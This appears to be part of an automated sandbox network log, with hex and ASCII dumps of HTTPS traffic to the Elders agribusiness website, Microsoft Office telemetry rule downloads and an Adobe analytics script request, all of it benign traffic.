                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 28 66 2c 20 62 2c 20 65 2c 20 76 2c 20 6e 2c 20 74 2c 20 73 29 20 7b 0a 20 20 69 66 20 28 66 2e 66 62 71 29 20 72 65 74 75 72 6e 3b 20 6e 20 3d 20 66 2e 66 62 71 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 20 3f 0a 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 2e 61 70 70 6c 79 28 6e 2c 20 61 72 67 75 6d 65 6e 74 73 29 20 3a 20 6e 2e 71 75 65 75 65 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 20 20 7d 3b 0a 20 20 69 66 20 28 21 66 2e 5f 66 62 71 29 20 66 2e 5f 66 62 71 20 3d 20 6e 3b 20 6e 2e 70 75 73 68 20 3d 20 6e 3b 20 6e 2e 6c 6f 61 64 65 64 20 3d 20 21 30 3b 20 6e 2e 76 65 72 73 69 6f 6e 20 3d 20 27 32 2e 30 27 3b 0a 20 20 6e 2e 71 75 65 75 65 20 3d 20 5b 5d 3b 20 74
                                                                                                                                                                                                            Data Ascii: nction (f, b, e, v, n, t, s) { if (f.fbq) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, arguments) : n.queue.push(arguments) }; if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0'; n.queue = []; t
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 3b 79 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 79 29 3b 0a 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 63 6c 61 72 69 74 79 22 2c 20 22 73 63 72 69 70 74 22 2c 20 22 6d 75 70 73 6a 72 6d 77 37 66 22 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 0a 20 20 20 20 0a 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 65 74 63 2e 63 6c 69 65 6e 74 6c 69 62 73 2f 65 6c 2f 63 6c 69 65 6e 74 6c 69 62 73 2f 63 6c 69 65 6e 74 6c 69 62 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 2e 6c 63 2d 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 2d 6c 63 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                            Data Ascii: ;y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "mupsjrmw7f");</script> <script src="/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js"></script>
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 32 70 72 65 76 69 6f 75 73 50 61 67 65 55 52 4c 5c 78 32 32 3a 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 65 6c 64 65 72 73 72 75 72 61 6c 2e 63 6f 6d 2e 61 75 5c 2f 6f 75 72 5c 75 30 30 32 44 73 65 72 76 69 63 65 73 5c 2f 66 69 6e 61 6e 63 69 61 6c 5c 75 30 30 32 44 73 65 72 76 69 63 65 73 5c 2f 5c 78 32 32 2c 5c 78 32 32 70 72 69 6d 61 72 79 43 61 74 65 67 6f 72 79 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 64 63 3a 74 69 74 6c 65 5c 78 32 32 3a 5c 78 32 32 48 6f 6d 65 5c 78 32 32 2c 5c 78 32 32 72 65 70 6f 3a 6d 6f 64 69 66 79 44 61 74 65 5c 78 32 32 3a 5c 78 32 32 32 33 5c 75 30 30 32 44 31 30 5c 75 30 30 32 44 32 30 32 34 20 32 33 3a 32 39 3a 34 36 5c 78 32 32 2c 5c 78 32 32 62 72 61 6e 64 5c 78 32 32 3a 5c 78 32 32 65 6c 64 65 72 73 5c 78
                                                                                                                                                                                                            Data Ascii: 2previousPageURL\x22:\x22https:\/\/eldersrural.com.au\/our\u002Dservices\/financial\u002Dservices\/\x22,\x22primaryCategory\x22:\x22\x22,\x22dc:title\x22:\x22Home\x22,\x22repo:modifyDate\x22:\x2223\u002D10\u002D2024 23:29:46\x22,\x22brand\x22:\x22elders\x
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 61 65 6d 2d 47 72 69 64 2d 2d 31 32 20 61 65 6d 2d 47 72 69 64 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 32 20 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 20 6e 61 76 69 67 61 74 69 6f 6e 20 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 20 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 32 22 3e 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 6e 74 5f 5f 68 65 61 64 65 72 2d 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 6e 74 5f 5f 68 65 61 64 65 72 2d 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                            Data Ascii: aem-Grid--12 aem-Grid--default--12 "> <div class="header navigation aem-GridColumn aem-GridColumn--default--12"> <div class="print__header--container"> <div class="print__header--image-container"> <a href="
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 2d 63 37 37 62 65 61 38 30 39 62 26 23 33 34 3b 2c 26 23 33 34 3b 78 64 6d 3a 6c 69 6e 6b 55 52 4c 26 23 33 34 3b 3a 26 23 33 34 3b 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 64 65 72 73 69 6e 73 75 72 61 6e 63 65 2e 63 6f 6d 2e 61 75 2f 26 23 33 34 3b 2c 26 23 33 34 3b 40 74 79 70 65 26 23 33 34 3b 3a 26 23 33 34 3b 65 6c 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 68 65 61 64 65 72 2f 76 31 2f 68 65 61 64 65 72 26 23 33 34 3b 2c 26 23 33 34 3b 64 63 3a 74 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 49 6e 73 75 72 61 6e 63 65 26 23 33 34 3b 2c 26 23 33 34 3b 69 6e 74 65 72 61 63 74 69 6f 6e 54 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 48 65 61 64 65 72 3a 4e 61 76 69 67 61 74 69 6f 6e 26 23 33 34 3b 7d 7d 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 73 75 72 61 6e
                                                                                                                                                                                                            Data Ascii: -c77bea809b&#34;,&#34;xdm:linkURL&#34;:&#34;https://www.eldersinsurance.com.au/&#34;,&#34;@type&#34;:&#34;el/components/header/v1/header&#34;,&#34;dc:title&#34;:&#34;Insurance&#34;,&#34;interactionTitle&#34;:&#34;Header:Navigation&#34;}}"> Insuran
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 61 64 65 72 3a 4e 61 76 69 67 61 74 69 6f 6e 26 23 33 34 3b 7d 7d 22 3e 0a 20 20 20 20 20 20 20 20 48 6f 6d 65 20 26 61 6d 70 3b 20 43 6f 6d 6d 65 72 63 69 61 6c 20 46 69 6e 61 6e 63 65 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 0a 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 64 65 72 73 77 65 61 74 68 65 72 2e 63 6f 6d 2e 61 75 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 63 6d 70 2d 63 6c 69 63 6b 61 62 6c 65 20 64 61 74 61 2d 63 6d 70 2d 64 61 74 61 2d 6c 61 79 65 72 3d 22 7b 26 23 33 34 3b 68 65 61 64 65 72 2d
                                                                                                                                                                                                            Data Ascii: ader:Navigation&#34;}}"> Home &amp; Commercial Finance </a> </li> <li class="nav-item"> <a class="nav-link" href="https://www.eldersweather.com.au/" target="_blank" data-cmp-clickable data-cmp-data-layer="{&#34;header-
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 79 70 65 26 23 33 34 3b 3a 26 23 33 34 3b 68 65 61 64 65 72 26 23 33 34 3b 2c 26 23 33 34 3b 63 6f 6d 70 6f 6e 65 6e 74 54 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 4c 61 74 65 73 74 20 53 68 61 72 65 20 50 72 69 63 65 26 23 33 34 3b 2c 26 23 33 34 3b 6e 61 6d 65 26 23 33 34 3b 3a 26 23 33 34 3b 61 73 78 69 67 75 61 6e 61 26 23 33 34 3b 2c 26 23 33 34 3b 6c 69 6e 6b 55 52 4c 26 23 33 34 3b 3a 26 23 33 34 3b 2f 63 6f 6e 74 65 6e 74 2f 65 6c 64 2f 61 75 2f 65 6e 2f 66 6f 72 2d 69 6e 76 65 73 74 6f 72 73 26 23 33 34 3b 2c 26 23 33 34 3b 6f 70 65 6e 49 6e 4e 65 77 54 61 62 26 23 33 34 3b 3a 26 23 33 34 3b 66 61 6c 73 65 26 23 33 34 3b 7d 7d 22 3e 3c 2f 65 6c 64 2d 63 75 73 74 6f 6d 2d 61 73 78 2d 69 67 75 61 6e 61 3e 0a 0a 0a 20 20 20 20 0a 0a 3c 2f 64 69
                                                                                                                                                                                                            Data Ascii: ype&#34;:&#34;header&#34;,&#34;componentTitle&#34;:&#34;Latest Share Price&#34;,&#34;name&#34;:&#34;asxiguana&#34;,&#34;linkURL&#34;:&#34;/content/eld/au/en/for-investors&#34;,&#34;openInNewTab&#34;:&#34;false&#34;}}"></eld-custom-asx-iguana> </di


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            25192.168.2.45769113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                            x-ms-request-id: 8a830f3b-e01e-001f-72e6-2e1633000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052942Z-17df447cdb5vq4m4hC1DFWrbp800000002c0000000000qg3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            26192.168.2.45769313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                            x-ms-request-id: ea0f8f90-301e-0020-7758-2e6299000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052942Z-15869dbbcc6lq45jhC1DFW7zwg00000006ng0000000068zg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            27192.168.2.45769513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                            x-ms-request-id: e16c3d14-801e-00a3-050a-2d7cfb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052942Z-16547b76f7fwvr5dhC1DFW2c94000000062g00000000d0hq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            28192.168.2.45769413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                            x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052942Z-16547b76f7f2g4rlhC1DFWnx88000000064g000000007a7b
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            29192.168.2.45769213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                            x-ms-request-id: 52c466ac-c01e-007a-7901-2db877000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052942Z-16547b76f7fr4g8xhC1DFW9cqc00000005ag00000000fgwn
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.457690162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC563OUTGET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            access-control-expose-headers: *
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                            etag: W/"15a2-MVUJigmi2LrilKBEw9gkUr3cbLw"
                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-served-by: cache-sjc10046-SJC, cache-sjc10025-SJC
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730563129.199387,VS0,VS0,VE29
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2affa8cea45e7-DFW
